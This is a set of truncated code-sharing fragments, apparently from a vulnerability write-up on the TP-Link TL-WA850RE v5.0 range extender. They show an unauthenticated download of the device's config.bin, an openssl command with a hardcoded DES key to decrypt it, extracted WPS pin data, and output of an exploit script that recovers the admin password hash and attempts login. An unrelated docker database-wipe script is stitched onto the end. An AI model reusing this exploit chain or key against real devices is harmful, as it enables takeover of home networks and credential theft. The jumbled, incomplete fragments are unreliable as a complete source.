This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
POST /data/wps.setup.json HTTP/1.1 | |
Origin: http://192.168.0.254 | |
Content-Length: 100 | |
Accept-Language: en-US,en;q=0.9 | |
Accept-Encoding: gzip, deflate | |
Connection: close | |
Accept: application/json, text/javascript, /; q=0.01 | |
User-Agent: Mozilla/5.0 | |
Host: 192.168.0.254 | |
X-Requested-With: XMLHttpRequest |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sub_40B990 => /fs/pages/userrpm/timeSettings_dst.html | |
sub_40E0C8 => /fs/pages/userrpm/connect.html | |
sub_40E144 => /fs/pages/userrpm/extend-settings.html | |
sub_40E04C => /fs/pages/userrpm/accessControl_adv.html | |
sub_40DF54 => /fs/pages/userrpm/region.html | |
sub_40DFD0 => /fs/pages/userrpm/wirelessSettings.html | |
sub_416DC0 => /fs/pages/userrpm/wifiCoverage.html | |
sub_418040 => /fs/pages/userrpm/dhcp.html | |
sub_419C90 => /fs/pages/userrpm/led.html | |
sub_41B484 => /fs/pages/frame/quick-setup.html |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ wget http://192.168.0.254/fs/data/config.bin | |
–2018–07–15 14:22:50– http://192.168.0.254/fs/data/config.bin | |
Connecting to 192.168.0.254:80… connected. | |
HTTP request sent, awaiting response… 200 OK | |
Length: unspecified [x-bin/octet-stream] | |
Saving to: ‘config.bin’ | |
2018–07–15 14:22:50 (127 MB/s) - ‘config.bin’ saved [1120] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ openssl enc -d -des-ecb -nopad -K 478DA50BF9E3D2CF -in config.bin > decrypted.bin |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ binwalk -e decrypted.bin | |
DECIMAL HEXADECIMAL DESCRIPTION | |
-------------------------------------------------------------------------------- | |
144 0x90 Zlib compressed data, default compression | |
$ file _decrypted.bin.extracted/90 | |
_decrypted.bin.extracted/90: ASCII text, with very long lines, with no line terminators |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"WPS" : { | |
"pinCode" : "46209573admin", | |
"pinEnabled" : 1, | |
"enabled" : 1, | |
"staWpsAvailable" : 3, | |
"apWpsAvailable" : 3 | |
}, | |
"POWER" : { | |
"start" : 75600, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> | |
<html xmlns="http://www.w3.org/1999/xhtml"> | |
<head> | |
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> | |
<meta http-equiv="pragma" content="no-cache"> | |
<meta http-equiv="cache-control" content="no-cache, must-revalidate"> | |
<meta http-equiv="expires" content="0"> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import os | |
import md5 | |
import zlib | |
import json | |
import socket | |
import urllib2 | |
import subprocess | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ python ./exploit.py 192.168.0.254 | |
[+] Requesting browser cookie… | |
[+] Retrieved cookie: ‘COOKIE=6500a8c000184c02; PATH=/; MAXAGE=9999; VERSION=1’ | |
[+] Attempting to retrieve device configuration data… | |
[+] Got encrypted config file for model: TL-WA850RE v5.0 | |
[+] Decrypting config file… | |
[+] Decompressing configuration data… | |
[+] Admin username: ‘admin’ | |
[+] Admin password (MD5): ‘1048552CDE8EBBBE4CAEF9D3B95AB41B’ | |
[+] Attempting login with password only… |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
SERVICE=$1 | |
read -r -p "This will completely wipe the ${SERVICE} database and restart the service. Are you sure? [y/N] " response | |
if [[ "$response" =~ ^([yY][eE][sS]|[yY])+$ ]] | |
then | |
docker-compose stop ${SERVICE} | |
docker-compose rm ${SERVICE} | |
VOLUME=`docker volume ls | grep ${SERVICE} | tr -s ' ' | cut -d' ' -f2` | |
docker volume rm -f ${VOLUME} |
OlderNewer